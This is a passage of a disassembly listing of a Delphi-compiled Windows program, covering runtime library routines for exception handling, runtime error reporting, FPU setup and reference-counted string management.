loc_402C54: ; CODE XREF: sub_402BD0+20�j
inc ch
loc_402C56: ; CODE XREF: sub_402BD0+25�j
mov bl, [esi]
inc esi
jmp short loc_402BF7
; ---------------------------------------------------------------------------
loc_402C5B: ; CODE XREF: sub_402BD0+2A�j
; sub_402BD0+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_402C46
loc_402C67: ; CODE XREF: sub_402BD0+C0�j
cmp bl, 61h
jb short loc_402C6F
sub bl, 20h
loc_402C6F: ; CODE XREF: sub_402BD0+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_402C82
sub bl, 11h
cmp bl, 5
ja short loc_402C4F
add bl, 0Ah
loc_402C82: ; CODE XREF: sub_402BD0+A5�j
cmp eax, edi
ja short loc_402C4F
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402C67
dec ch
jnz short loc_402C98
neg eax
loc_402C98: ; CODE XREF: sub_402BD0+72�j
; sub_402BD0+7B�j ...
pop ecx
xor esi, esi
loc_402C9B: ; CODE XREF: sub_402BD0+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_402BD0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402CA4 proc near ; CODE XREF: sub_402CAC+5�p
; sub_402CAC+11�p
jmp ds:dword_4080E8
sub_402CA4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402CAC proc near ; CODE XREF: sub_403A78+39�p
push ebx
xor ebx, ebx
push 0
call sub_402CA4 ; GetKeyboardType
cmp eax, 7
jnz short loc_402CD7
push 1
call sub_402CA4 ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_402CD5
cmp eax, 400h
jnz short loc_402CD7
loc_402CD5: ; CODE XREF: sub_402CAC+20�j
mov bl, 1
loc_402CD7: ; CODE XREF: sub_402CAC+D�j
; sub_402CAC+27�j
mov eax, ebx
pop ebx
retn
sub_402CAC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CDC proc near ; CODE XREF: sub_403A78+42�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, ds:word_40600C
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_401078 ; RegOpenKeyExA
test eax, eax
jnz short loc_402D54
xor eax, eax
push ebp
push offset loc_402D4D
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_401080 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402D54
loc_402D43: ; CODE XREF: sub_402CDC+76�j
mov eax, [ebp+var_4]
push eax
call sub_401070 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_402D4D: ; DATA XREF: sub_402CDC+2E�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_402D43
; ---------------------------------------------------------------------------
loc_402D54: ; CODE XREF: sub_402CDC+29�j
; DATA XREF: sub_402CDC+62�o
mov ax, ds:word_40600C
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov ds:word_40600C, ax
mov esp, ebp
pop ebp
retn
sub_402CDC endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_402CDC+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_402CDC+4C�o
align 10h
; =============== S U B R O U T I N E =======================================
sub_402DA0 proc near ; CODE XREF: sub_403230-368�p
; CODE:00403176�p ...
fninit
wait
fldcw ds:word_40600C
retn
sub_402DA0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DAC proc near ; CODE XREF: CODE:00402FC7�j
; sub_40300C+30�p ...
test eax, eax
jz short locret_402DB7
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_402DB7: ; CODE XREF: sub_402DAC+2�j
retn
sub_402DAC endp
; =============== S U B R O U T I N E =======================================
sub_402DB8 proc near ; CODE XREF: sub_40300C+35�p
cmp ds:byte_406010, 1
jbe short locret_402DD2
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_407010
locret_402DD2: ; CODE XREF: sub_402DB8+7�j
retn
sub_402DB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DD4 proc near ; CODE XREF: sub_403230-33B�p
cmp ds:byte_406010, 0
jz short locret_402DF4
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_407010
add esp, 8
pop eax
locret_402DF4: ; CODE XREF: sub_402DD4+7�j
retn
sub_402DD4 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402E10
loc_402DF8: ; CODE XREF: sub_402E10+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_407010
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_402E10
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402E10 proc near ; CODE XREF: sub_403230-28B�p
; FUNCTION CHUNK AT 00402DF8 SIZE 00000015 BYTES
cmp ds:byte_406010, 1
jbe short locret_402E20
push eax
push ebx
jmp loc_402DF8
; ---------------------------------------------------------------------------
locret_402E20: ; CODE XREF: sub_402E10+7�j
retn
sub_402E10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402E24 proc near ; CODE XREF: sub_402E44+C�p
test ecx, ecx
jz short locret_402E41
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_402E3C
cmp byte ptr [ecx], 0EBh
jnz short locret_402E41
movsx eax, al
inc ecx
inc ecx
jmp short loc_402E3F
; ---------------------------------------------------------------------------
loc_402E3C: ; CODE XREF: sub_402E24+A�j
add ecx, 5
loc_402E3F: ; CODE XREF: sub_402E24+16�j
add ecx, eax
locret_402E41: ; CODE XREF: sub_402E24+2�j
; sub_402E24+F�j
retn
sub_402E24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402E44 proc near ; CODE XREF: sub_401904+16F5�p
cmp ds:byte_406010, 1
jbe short locret_402E6A
push eax
push edx
push ecx
call sub_402E24
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_407010
pop ecx
pop ecx
pop edx
pop eax
locret_402E6A: ; CODE XREF: sub_402E44+7�j
retn
sub_402E44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402E6C proc near ; CODE XREF: sub_403060+28�p
cmp ds:byte_406010, 1
jbe short locret_402E87
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_407010
pop edx
locret_402E87: ; CODE XREF: sub_402E6C+7�j
retn
sub_402E6C endp
; =============== S U B R O U T I N E =======================================
sub_402E88 proc near ; CODE XREF: CODE:loc_4031BD�p
push eax
push edx
cmp ds:byte_406010, 1
jbe short loc_402EA3
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_407010
loc_402EA3: ; CODE XREF: sub_402E88+9�j
pop edx
pop eax
retn
sub_402E88 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_403230
loc_402EA8: ; CODE XREF: sub_403230:loc_403285�j
; sub_4032A0:loc_4032F5�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jnz loc_402FCC
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_402F35
cld
call sub_402DA0
mov edx, ds:dword_40700C
test edx, edx
jz loc_402FCC
call edx
test eax, eax
jz loc_402FCC
mov edx, [esp-4+arg_8]
mov ecx, [esp-4+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_402F2C
call sub_402DD4
cmp ds:byte_406014, 0
jbe short loc_402F2C
cmp ds:byte_406010, 0
ja short loc_402F2C
lea ecx, [esp-4+arg_0]
push eax
push ecx
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_402FCC
mov edx, eax
mov eax, [esp+4]
mov ecx, [eax+0Ch]
jmp short loc_402F5C
; ---------------------------------------------------------------------------
loc_402F2C: ; CODE XREF: sub_403230-33D�j
; sub_403230-32F�j ...
mov edx, eax
mov eax, [esp-4+arg_0]
mov ecx, [eax+0Ch]
loc_402F35: ; CODE XREF: sub_403230-36B�j
cmp ds:byte_406014, 1
jbe short loc_402F5C
cmp ds:byte_406010, 0
ja short loc_402F5C
push eax
lea eax, [esp+arg_0]
push edx
push ecx
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_402FCC
loc_402F5C: ; CODE XREF: sub_403230-306�j
; sub_403230-2F4�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_0]
push 0
push eax
push offset loc_402F80
push edx
call ds:off_407014
loc_402F80: ; DATA XREF: sub_403230-2BC�o
mov edi, [esp+30h+var_8]
call sub_403BC4
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset sub_402FAC
add ebx, 5
call sub_402E10
jmp ebx
; END OF FUNCTION CHUNK FOR sub_403230
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FAC proc near ; DATA XREF: sub_403230-295�o
jmp loc_402FD4
sub_402FAC endp
; ---------------------------------------------------------------------------
call sub_403BC4
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_402DAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403230
loc_402FCC: ; CODE XREF: sub_403230-37D�j
; sub_403230-35B�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_403230
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_401904
loc_402FD4: ; CODE XREF: sub_401904:loc_4019CC�j
; sub_4019DC:loc_401AD0�j ...
mov eax, [esp+4]
mov edx, [esp+8]
test dword ptr [eax+4], 6
jz short loc_403004
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_403004
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_402E44
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_403004: ; CODE XREF: sub_401904+16DF�j
; DATA XREF: sub_401904+16E4�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_401904
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40300C proc near ; CODE XREF: sub_403230+5F�p
; sub_4032A0+5F�p
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_403057
call sub_403BC4
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_403046
mov eax, [edx+8]
call sub_402DAC
call sub_402DB8
loc_403046: ; CODE XREF: sub_40300C+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_403057: ; DATA XREF: sub_40300C+4�o
mov eax, 1
retn
sub_40300C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403060 proc near ; CODE XREF: sub_403230+64�p
; sub_4032A0+64�p ...
arg_2C = dword ptr 30h
call sub_403BC4
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_402DAC
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_402E6C
jmp edx
sub_403060 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403090 proc near ; CODE XREF: sub_402160+10C�p
; sub_402160+16A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_403090 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_4030A8: ; CODE XREF: CODE:004031A8�j
; CODE:004031B4�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_4030E3
jz short loc_403115
cmp eax, 0C000008Eh
jg short loc_4030D5
jz short loc_403119
sub eax, 0C0000005h
jz short loc_403125
sub eax, 87h
jz short loc_40310D
dec eax
jz short loc_403121
jmp short loc_403135
; ---------------------------------------------------------------------------
loc_4030D5: ; CODE XREF: CODE:004030BE�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_403115
jz short loc_403111
jmp short loc_403135
; ---------------------------------------------------------------------------
loc_4030E3: ; CODE XREF: CODE:004030B5�j
cmp eax, 0C0000096h
jg short loc_4030FB
jz short loc_403129
sub eax, 0C0000093h
jz short loc_403121
dec eax
jz short loc_403109
dec eax
jz short loc_40311D
jmp short loc_403135
; ---------------------------------------------------------------------------
loc_4030FB: ; CODE XREF: CODE:004030E8�j
sub eax, 0C00000FDh
jz short loc_403131
sub eax, 3Dh
jz short loc_40312D
jmp short loc_403135
; ---------------------------------------------------------------------------
loc_403109: ; CODE XREF: CODE:004030F4�j
mov al, 0C8h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_40310D: ; CODE XREF: CODE:004030CE�j
mov al, 0C9h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403111: ; CODE XREF: CODE:004030DF�j
mov al, 0CDh
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403115: ; CODE XREF: CODE:004030B7�j
; CODE:004030DD�j
mov al, 0CFh
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403119: ; CODE XREF: CODE:004030C0�j
mov al, 0C8h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_40311D: ; CODE XREF: CODE:004030F7�j
mov al, 0D7h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403121: ; CODE XREF: CODE:004030D1�j
; CODE:004030F1�j
mov al, 0CEh
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403125: ; CODE XREF: CODE:004030C7�j
mov al, 0D8h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403129: ; CODE XREF: CODE:004030EA�j
mov al, 0DAh
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_40312D: ; CODE XREF: CODE:00403105�j
mov al, 0D9h
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403131: ; CODE XREF: CODE:00403100�j
mov al, 0CAh
jmp short loc_403137
; ---------------------------------------------------------------------------
loc_403135: ; CODE XREF: CODE:004030D3�j
; CODE:004030E1�j ...
mov al, 0FFh
loc_403137: ; CODE XREF: CODE:0040310B�j
; CODE:0040310F�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_402854
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_403148: ; DATA XREF: sub_4031E8+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_4031E2
cmp ds:byte_406010, 0
ja short loc_403171
lea eax, [esp+4]
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_4031E2
loc_403171: ; CODE XREF: CODE:00403160�j
mov eax, [esp+4]
cld
call sub_402DA0
mov edx, [esp+8]
push 0
push eax
push offset loc_40318E
push edx
call ds:off_407014
loc_40318E: ; DATA XREF: CODE:00403182�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_4031BD
mov edx, ds:dword_40700C
test edx, edx
jz loc_4030A8
mov eax, ebx
call edx
test eax, eax
jz loc_4030A8
mov edx, [ebx+0Ch]
loc_4031BD: ; CODE XREF: CODE:0040319E�j
call sub_402E88
mov ecx, ds:dword_407004
test ecx, ecx
jz short loc_4031CE
call ecx
loc_4031CE: ; CODE XREF: CODE:004031CA�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_403554
; ---------------------------------------------------------------------------
loc_4031E2: ; CODE XREF: CODE:00403153�j
; CODE:0040316F�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4031E8 proc near ; CODE XREF: sub_403310+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_403148
mov [eax+8], ebp
mov ds:dword_407624, eax
retn
sub_4031E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403208 proc near ; CODE XREF: sub_403468:loc_4034F8�p
xor edx, edx
mov eax, ds:dword_407624
test eax, eax
jz short locret_40322F
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_403222
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_403220: ; CODE XREF: sub_403208+21�j
mov ecx, [ecx]
loc_403222: ; CODE XREF: sub_403208+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_40322F
cmp [ecx], eax
jnz short loc_403220
mov eax, [eax]
mov [ecx], eax
locret_40322F: ; CODE XREF: sub_403208+9�j
; sub_403208+1D�j
retn
sub_403208 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403230 proc near ; CODE XREF: sub_403230+5A�p
; sub_4032A0+5A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00402EA8 SIZE 00000104 BYTES
; FUNCTION CHUNK AT 00402FCC SIZE 00000006 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, offset dword_407620
mov eax, [esi+8]
test eax, eax
jz short loc_403299
mov ebx, [esi+0Ch]
mov eax, [eax+4]
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_403285
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jle short loc_40327B
loc_403260: ; CODE XREF: sub_403230+49�j
dec ebx
mov [esi+0Ch], ebx
mov eax, [ebp+var_4]
mov eax, [eax+ebx*8+4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403277
call [ebp+var_8]
loc_403277: ; CODE XREF: sub_403230+42�j
test ebx, ebx
jg short loc_403260
loc_40327B: ; CODE XREF: sub_403230+2E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_403299
; ---------------------------------------------------------------------------
loc_403285: ; DATA XREF: sub_403230+21�o
jmp loc_402EA8
; ---------------------------------------------------------------------------
call sub_403230
call sub_40300C
call sub_403060
loc_403299: ; CODE XREF: sub_403230+13�j
; sub_403230+53�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_403230 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032A0 proc near ; CODE XREF: sub_403310+3A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov edi, offset dword_407620
mov eax, [edi+8]
test eax, eax
jz short loc_403309
mov esi, [eax]
xor ebx, ebx
mov eax, [eax+4]
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4032F5
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp esi, ebx
jle short loc_4032EB
loc_4032D1: ; CODE XREF: sub_4032A0+49�j
mov eax, [ebp+var_4]
mov eax, [eax+ebx*8]
mov [ebp+var_8], eax
inc ebx
mov [edi+0Ch], ebx
cmp [ebp+var_8], 0
jz short loc_4032E7
call [ebp+var_8]
loc_4032E7: ; CODE XREF: sub_4032A0+42�j
cmp esi, ebx
jg short loc_4032D1
loc_4032EB: ; CODE XREF: sub_4032A0+2F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_403309
; ---------------------------------------------------------------------------
loc_4032F5: ; DATA XREF: sub_4032A0+22�o
jmp loc_402EA8
; ---------------------------------------------------------------------------
call sub_403230
call sub_40300C
call sub_403060
loc_403309: ; CODE XREF: sub_4032A0+13�j
; sub_4032A0+53�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4032A0 endp
; =============== S U B R O U T I N E =======================================
sub_403310 proc near ; CODE XREF: sub_403C10+3A�p
mov ds:off_407010, offset sub_401008
mov ds:off_407014, offset sub_401010
mov ds:off_407628, eax
xor eax, eax
mov ds:dword_40762C, eax
mov ds:off_407630, edx
mov eax, [edx+4]
mov ds:dword_40701C, eax
call sub_4031E8
mov ds:byte_407024, 0
call sub_4032A0
retn
sub_403310 endp
; =============== S U B R O U T I N E =======================================
sub_403350 proc near ; CODE XREF: sub_403468+34�p
push ebx
push esi
push edi
mov esi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov cl, 10h
mov ebx, ds:dword_406000
loc_403360: ; CODE XREF: sub_403350+33�j
mov eax, ebx
mov edi, 0Ah
cdq
idiv edi
add dl, 30h
xor eax, eax
mov al, cl
mov [esi+eax], dl
mov eax, ebx
mov ebx, 0Ah
cdq
idiv ebx
mov ebx, eax
dec ecx
test ebx, ebx
jnz short loc_403360
mov cl, 1Ch
mov eax, ds:dword_406004
loc_40338C: ; CODE XREF: sub_403350+54�j
mov edx, eax
and edx, 0Fh
mov dl, ds:byte_406074[edx]
xor ebx, ebx
mov bl, cl
mov [esi+ebx], dl
shr eax, 4
dec ecx
test eax, eax
jnz short loc_40338C
pop edi
pop esi
pop ebx
retn
sub_403350 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033AC proc near ; CODE XREF: sub_403468+A4�p
xor eax, eax
xchg eax, ds:dword_406000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_407620
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_4033AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033DC proc near ; CODE XREF: sub_403468+39�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_407034, 0
jz short loc_40343D
cmp ds:word_407208, 0D7B2h
jnz short loc_403405
cmp ds:dword_407210, 0
jbe short loc_403405
mov eax, offset dword_407204
call ds:dword_407220
loc_403405: ; CODE XREF: sub_4033DC+13�j
; sub_4033DC+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_403464
push 0FFFFFFF5h
call sub_401000 ; GetStdHandle
push eax
call sub_401020 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_40343D: ; CODE XREF: sub_4033DC+8�j
cmp ds:byte_406018, 0
jnz short loc_403459
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_401038 ; MessageBoxA
loc_403459: ; CODE XREF: sub_4033DC+68�j
pop edx
retn
sub_4033DC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_403464 dd 0A0Dh
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403468 proc near ; CODE XREF: sub_403548+5�p
; CODE:0040544E�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, offset dword_407620
mov esi, offset dword_407030
cmp byte ptr [ebx+28h], 0
jnz short loc_403493
cmp dword ptr [esi], 0
jz short loc_403493
loc_403482: ; CODE XREF: sub_403468+29�j
mov eax, [esi]
mov [esp+14h+var_14], eax
xor eax, eax
mov [esi], eax
call [esp+14h+var_14]
cmp dword ptr [esi], 0
jnz short loc_403482
loc_403493: ; CODE XREF: sub_403468+13�j
; sub_403468+18�j
cmp ds:dword_406004, 0
jz short loc_4034AD
call sub_403350
call sub_4033DC
xor eax, eax
mov ds:dword_406004, eax
loc_4034AD: ; CODE XREF: sub_403468+32�j
; sub_403468+D5�j
cmp byte ptr [ebx+28h], 2
jnz short loc_4034C1
cmp ds:dword_406000, 0
jnz short loc_4034C1
xor eax, eax
mov [ebx+0Ch], eax
loc_4034C1: ; CODE XREF: sub_403468+49�j
; sub_403468+52�j
call sub_403230
cmp byte ptr [ebx+28h], 1
jbe short loc_4034D5
cmp ds:dword_406000, 0
jz short loc_4034F8
loc_4034D5: ; CODE XREF: sub_403468+62�j
mov edi, [ebx+10h]
test edi, edi
jz short loc_4034F8
mov eax, edi
call sub_40392C
mov ebp, [ebx+10h]
mov esi, [ebp+10h]
cmp esi, [ebp+4]
jz short loc_4034F8
test esi, esi
jz short loc_4034F8
push esi
call sub_401040 ; FreeLibrary
loc_4034F8: ; CODE XREF: sub_403468+6B�j
; sub_403468+72�j ...
call sub_403208
cmp byte ptr [ebx+28h], 1
jnz short loc_403506
call dword ptr [ebx+24h]
loc_403506: ; CODE XREF: sub_403468+99�j
cmp byte ptr [ebx+28h], 0
jz short loc_403511
call sub_4033AC
loc_403511: ; CODE XREF: sub_403468+A2�j
cmp dword ptr [ebx], 0
jnz short loc_403530
cmp ds:dword_407018, 0
jz short loc_403525
call ds:dword_407018
loc_403525: ; CODE XREF: sub_403468+B5�j
mov eax, ds:dword_406000
push eax
call sub_401030 ; ExitProcess
loc_403530: ; CODE XREF: sub_403468+AC�j
mov eax, [ebx]
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
jmp loc_4034AD
sub_403468 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403548 proc near ; CODE XREF: sub_402854+6�p
; sub_403554+6�j ...
mov ds:dword_406000, eax
call sub_403468
sub_403548 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403554 proc near ; CODE XREF: CODE:004031DD�j
; sub_403B80+1A�p ...
pop ds:dword_406004
jmp sub_403548
sub_403554 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403560 proc near ; CODE XREF: sub_402A6C+E�p
; sub_403624+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_403582
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_403582
lock dec dword ptr [edx-8]
jnz short locret_403582
push eax
lea eax, [edx-8]
call sub_4027E4
pop eax
locret_403582: ; CODE XREF: sub_403560+4�j
; sub_403560+10�j ...
retn
sub_403560 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403584 proc near ; CODE XREF: sub_403F24+114�p
; sub_4041C0+259�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_40358A: ; CODE XREF: sub_403584+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_4035AA
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_4035AA
lock dec dword ptr [edx-8]
jnz short loc_4035AA
lea eax, [edx-8]
call sub_4027E4
loc_4035AA: ; CODE XREF: sub_403584+A�j
; sub_403584+16�j ...
add ebx, 4
dec esi
jnz short loc_40358A
pop esi
pop ebx
retn
sub_403584 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4035B4 proc near ; CODE XREF: sub_403690+8�j
; sub_4036D4+6�j ...
test edx, edx
jz short loc_4035DC
mov ecx, [edx-8]
inc ecx
jg short loc_4035D8
push eax
push edx
mov eax, [edx-4]
call sub_4035F8
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_4028C8
pop edx
pop eax
jmp short loc_4035DC
; ---------------------------------------------------------------------------
loc_4035D8: ; CODE XREF: sub_4035B4+8�j
lock inc dword ptr [edx-8]
loc_4035DC: ; CODE XREF: sub_4035B4+2�j
; sub_4035B4+22�j
xchg edx, [eax]
test edx, edx
jz short locret_4035F6
mov ecx, [edx-8]
dec ecx
jl short locret_4035F6
lock dec dword ptr [edx-8]
jnz short locret_4035F6
lea eax, [edx-8]
call sub_4027E4
locret_4035F6: ; CODE XREF: sub_4035B4+2C�j
; sub_4035B4+32�j ...
retn
sub_4035B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4035F8 proc near ; CODE XREF: sub_4035B4+F�p
; sub_403624+B�p ...
test eax, eax
jle short loc_403620
push eax
